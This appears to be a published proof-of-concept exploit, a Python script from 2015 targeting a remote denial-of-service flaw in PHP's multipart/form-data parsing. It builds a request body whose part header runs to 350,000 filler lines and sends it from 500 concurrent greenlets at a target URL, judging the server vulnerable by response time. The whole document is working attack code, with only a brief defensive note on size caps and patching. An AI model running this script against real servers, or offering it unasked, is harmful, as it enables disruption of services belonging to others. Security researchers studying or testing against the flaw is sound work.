PHP multipart/form-data Remote DOS Vulnerability

24 Dec 2015 - evi1m0

#!/usr/bin/env python
# coding : utf8
# author : evi1m0@2015
# website: www.n0tr00t.com

import sys
import datetime
import requests

import gevent
import gevent.monkey
# Swap the standard socket module for gevent's cooperative version so the
# blocking HTTP calls made inside each greenlet yield to one another instead
# of running one after the other.
gevent.monkey.patch_socket()


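def check_vulnerability(target, body, headers):
    """POST *body* to *target* and classify the server by response time.

    The verdict is a timing heuristic only: a completed request that took
    more than 5 whole seconds is reported as vulnerable, anything else as
    failed. Slow networks or a server that is busy for unrelated reasons
    will also cross that threshold, so a positive result should be
    confirmed against the installed PHP version.

    Args:
        target: URL the request is sent to.
        body: raw request body, passed to requests.post as the data.
        headers: dict of HTTP headers for the request.

    Returns:
        A ``(result, usetime)`` tuple: the verdict string and the elapsed
        time in whole seconds.
    """
    starttime = datetime.datetime.now()
    completed = False
    try:
        # NOTE(review): no timeout is passed, so a server that stops
        # answering keeps this call (and its greenlet) waiting indefinitely.
        requests.post(target, body, headers=headers)
        completed = True
    except Exception as e:
        print('[-] Request Error: ' + str(e))
    elapsed = datetime.datetime.now() - starttime
    # total_seconds() covers the whole interval; .seconds alone drops the
    # days component of the timedelta.
    usetime = int(elapsed.total_seconds())
    # A request that errored out (refused, reset, DNS failure, ...) tells us
    # nothing about how long the server spent parsing the body, so it must
    # never be reported as vulnerable, however long the failure took.
    if completed and usetime > 5:
        result = '[+] {url} is vulnerability'.format(url=target)
    else:
        result = '[-] Failed'
    return result, usetime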


def main(i, target):
    """Send one oversized multipart request to *target* and print the verdict.

    The body contains a single part. Its Content-Disposition line is
    followed by 350000 two-byte lines ("a" plus a newline, about 700 KB in
    total) before the Content-Type header and the blank line that ends the
    part headers, so the multipart parser sees an extremely long header
    block.
    NOTE(review): presumably the parser treats each colon-less line as a
    continuation of the previous header and pays a growing cost per line;
    the page does not state the root cause, so confirm against the PHP
    advisory for this issue.

    For defenders: a request of this shape is recognisable by a
    multipart part whose header block runs to hundreds of thousands of
    lines, and a request-body size cap below roughly 700 KB at the web
    server or proxy rejects this particular body before PHP parses it.
    Upgrading PHP to a release that contains the fix is the actual remedy.

    Args:
        i: sequence number of this probe, used only in the printed output.
        target: URL handed to check_vulnerability.

    Returns:
        The ``(result, usetime)`` tuple produced by check_vulnerability.
    """
    payload = ''.join([
        # Opening boundary and the part's first header line.
        "------WebKitFormBoundaryX3B7rDMPcQlzmJE1\nContent-Disposition"
        ": form-data; name=\"file\"; filename=1.jpg",
        # The filler lines that make the header block abnormally long.
        'a\n' * 350000,
        # Remaining header, part content and the closing boundary.
        'Content-Type: application/octet-stream\r\n\r\ndatadata'
        '\r\n------WebKitFormBoundaryX3B7rDMPcQlzmJE1--',
    ])
    request_headers = {
        'Content-Type': ('multipart/form-data; boundary=----WebKit'
                         'FormBoundaryX3B7rDMPcQlzmJE1'),
        'Accept-Encoding': 'gzip, deflate',
        'User-Agent': ('Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:'
                       '24.0) Gecko/20100101 Firefox/24.0'),
    }
    verdict, seconds = check_vulnerability(target, payload, request_headers)
    # The "Checking..." line is printed only after the request has returned.
    print('[%s] Checking...' % str(i))
    print(verdict)
    print('[*] Response time: %s' % str(seconds))
    return verdict, seconds


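if __name__ == '__main__':
    # Entry point: takes the target as the only argument, normalises it to a
    # URL and runs the probe from 500 greenlets at once.
    if len(sys.argv) <= 1:
        print('[-] Usage: script.py target')
        # A usage error is a failure; exit non-zero so callers can tell.
        sys.exit(1)
    # Only a real scheme prefix counts. A bare startswith('http') would leave
    # a host name such as "httpd.example" (constructed example) without a
    # scheme, and requests would then reject it.
    if sys.argv[1].lower().startswith(('http://', 'https://')):
        target = sys.argv[1]
    else:
        target = 'http://{}'.format(sys.argv[1])
    # Each greenlet uploads the full body (about 700 KB), so the measured
    # response times reflect 500 concurrent uploads as well as the cost of
    # parsing a single request.
    jobs = [gevent.spawn(main, i, target) for i in range(0, 500)]
    gevent.joinall(jobs)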